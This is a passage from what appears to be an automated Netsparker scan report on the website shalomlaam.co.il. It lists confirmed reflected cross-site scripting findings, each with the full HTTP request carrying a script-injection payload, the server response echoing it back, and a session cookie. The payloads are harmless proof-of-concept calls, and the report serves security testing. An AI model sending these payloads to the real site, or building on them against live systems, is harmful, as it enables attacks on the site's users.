GET /search/default.asp?q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000245)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

valign="top">
<table width="800" border="0" cellspacing="0" cellpadding="0">
<tr dir="rtl">
<td valign="top"><h1><span class="text_h1"><span class="koteret" dir="rtl"> ''''--></style></script><script>netsparker(0x000245)</script></span></span></h1>
<table width="560" border="0" align="left" cellpadding="0" cellspacing="0">
<tr><td><span style="font-weight:Normal; font-size:15px;"> 0 </sp

32 / 146
3.24. /tags/tags.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001CB)</script>
Request
GET /tags/tags.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001CB)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:56 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/tags/tags.asp'"--></style></script><script>netsparker(0x0001CB)</script><BR>script><BR>style><<script>netsparker(0x0001CB)<.asp?id=script>
3.25. /js/+%20win%20+ CONFIRMED
http://www.shalomlaam.co.il/js/+%20win%20+?'"--></style></script><script>alert(0x00040D)</script>
Parameters
Parameter Type Value
Query Based Query String '"--></style></script>
<script>alert(0x00040D)</script>
Request
GET /js/+%20win%20+?'"--></style></script><script>netsparker(0x00040D)</script> HTTP/1.1
Referer: http://www.shalomlaam.co.il/js/func_site.js
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:00:55 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/+ win +?'"--></style></script><script>netsparker(0x00040D)</script><BR>script><BR>style><<script>netsparker(0x00040D)<.asp?id=script>
33 / 146
3.26. /jAccordion/default.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000127)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000127)</script>
Request
GET /jAccordion/default.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000127)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:21 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 182
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/jAccordion/default.css'"--></style></script><script>netsparker(0x000127)</script><BR>script><BR>style><<script>netsparker(0x000127)<.asp?id=script>
3.27. /Presentation/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000145)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00014..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000145)</script>
Request
GET /Presentation/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000145)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:42 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/Presentation/'"--></style></script><script>netsparker(0x000145)</script><BR>script><BR>style><<script>netsparker(0x000145)<.asp?id=script>
34 / 146
3.28. /contact/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00046E)</script>
Request
GET /contact/reg/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00046E)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:02:57 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 172
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/reg/'"--></style></script><script>netsparker(0x00046E)</script><BR>script><BR>style><<script>netsparker(0x00046E)<.asp?id=script>
3.29. /l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001A7)%3C/scrip..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0001A7)</script>
Request
GET /l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001A7)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:47:18 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 162
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/l/'"--></style></script><script>netsparker(0x0001A7)</script><BR>script><BR>style><<script>netsparker(0x0001A7)<.asp?id=script>
3.30. /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000FD)</script>
35 / 146
Request
GET /scripts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000FD)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:07 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 168
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/scripts/'"--></style></script><script>netsparker(0x0000FD)</script><BR>script><BR>style><<script>netsparker(0x0000FD)<.asp?id=script>
3.31. /gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000115)%3C/..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000115)</script>
Request
GET /gvideo/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000115)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 167
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/gvideo/'"--></style></script><script>netsparker(0x000115)</script><BR>script><BR>style><<script>netsparker(0x000115)<.asp?id=script>
3.32. /contact/search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004D2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/contact/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..
Parameters
Parameter Type Value
q GET 3
URI-BASED Full URL '"--></style></script>
<script>alert(0x0004D2)</script>
Request
GET /contact/search/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0004D2)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
36 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:33 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 186
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/search/default.asp'"--></style></script><script>netsparker(0x0004D2)</script><BR>script><BR>style><<script>netsparker(0x0004D2)<.asp?id=script>
3.33. /contact/reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000498)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/contact/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscrip..
Parameters
Parameter Type Value
emailtonews POST netsparker@example.com
URI-BASED Full URL '"--></style></script>
<script>alert(0x000498)</script>
Request
POST /contact/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000498)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 37
Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:03:12 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 190
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/contact/reg/maillingUpdate.asp'"--></style></script><script>netsparker(0x000498)</script><BR>script><BR>style><<script>netsparker(0x000498)<.asp?
id=script>
3.34. /kaftorim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057E)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/kaftorim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057E)%3..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00057E)</script>
Request
GET /kaftorim/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00057E)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
37 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:04:37 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 169
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/kaftorim/'"--></style></script><script>netsparker(0x00057E)</script><BR>script><BR>style><<script>netsparker(0x00057E)<.asp?id=script>
3.35. /ask/ CONFIRMED
http://www.shalomlaam.co.il/ask/?cat=3&page=3&rabbi='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..
Parameters
Parameter Type Value
cat GET 3
page GET 3
rabbi GET '"--></style></script>
<script>alert(0x000611)</script>
tbl GET 3
Request
GET /ask/?cat=3&page=3&rabbi='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000611)%3C/script%3E&tbl=3 HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response

top" width="50">
<form name=form method=get target="_top">
<INPUT TYPE='hidden' NAME='tbl' value=''>
<INPUT TYPE='hidden' NAME='cat' value='3'>
<INPUT TYPE='hidden' NAME='rabbi' value=''"--></style></script><script>netsparker(0x000611)</script>'>
<select name='page' dir=rtl onChange='form.submit()'>
<script LANGUAGE="JavaScript">
for(var i=1;i<=23;i++){
if (i!=3){
document.write('<option value='+i+'>'+i);
}
else

3.36. /ask/reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000642)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..
Parameters
Parameter Type Value
emailtonews POST netsparker@example.com
URI-BASED Full URL '"--></style></script>
<script>alert(0x000642)</script>
Request
POST /ask/reg/maillingUpdate.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000642)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/ask/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 37
Accept-Encoding: gzip, deflate
emailtonews=netsparker%40example.com&
38 / 146
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 14:07:54 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 186
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/ask/reg/maillingUpdate.asp'"--></style></script><script>netsparker(0x000642)</script><BR>script><BR>style><<script>netsparker(0x000642)<.asp?id=script>
3.37. /default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000216)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000216)..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000216)</script>
Request
GET /default.asp'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000216)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:48:35 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 171
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/default.asp'"--></style></script><script>netsparker(0x000216)</script><BR>script><BR>style><<script>netsparker(0x000216)<.asp?id=script>
3.38. /site/yeshiva/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B1)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002B..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002B1)</script>
Request
GET /site/yeshiva/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002B1)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:56:30 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 173
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/site/yeshiva/'"--></style></script><script>netsparker(0x0002B1)</script><BR>script><BR>style><<script>netsparker(0x0002B1)<.asp?id=script>
39 / 146
3.39. /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000D7)%3C/scri..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0000D7)</script>
Request
GET /js/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000D7)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:43:52 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 163
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/js/'"--></style></script><script>netsparker(0x0000D7)</script><BR>script><BR>style><<script>netsparker(0x0000D7)<.asp?id=script>
3.40. /home/1.css'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000119)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/home/1.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000119)%..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x000119)</script>
Request
GET /home/1.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000119)%3C/script%3E HTTP/1.1
Referer: http://www.shalomlaam.co.il/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Date: Tue, 20 May 2014 13:44:17 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 170
Pragma: no-cache
Expires: Tue, 01 Jan 1971 02:00:00 GMT
404;http://www.shalomlaam.co.il:80/home/1.css'"--></style></script><script>netsparker(0x000119)</script><BR>script><BR>style><<script>netsparker(0x000119)<.asp?id=script>
40 / 146
3.41. /site/contact/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028A)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00028..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x00028A)</script>
Request
GET /site/contact/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00028A)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 20 May 2014 13:56:05 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Encoding:
Vary: Accept-Encoding
Transfer-Encoding: chunked
404;http://www.shalomlaam.co.il:80/site/contact/'"--></style></script><script>netsparker(0x00028A)</script><BR>script><BR>style><<script>netsparker(0x00028A)<.asp?id=script>
3.42. /site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/script%3E
CONFIRMED
http://www.shalomlaam.co.il/site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A2)%3C/..
Parameters
Parameter Type Value
URI-BASED Full URL '"--></style></script>
<script>alert(0x0002A2)</script>
Request
GET /site/l/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A2)%3C/script%3E HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 20 May 2014 13:56:22 GMT
Content-Type: text/html
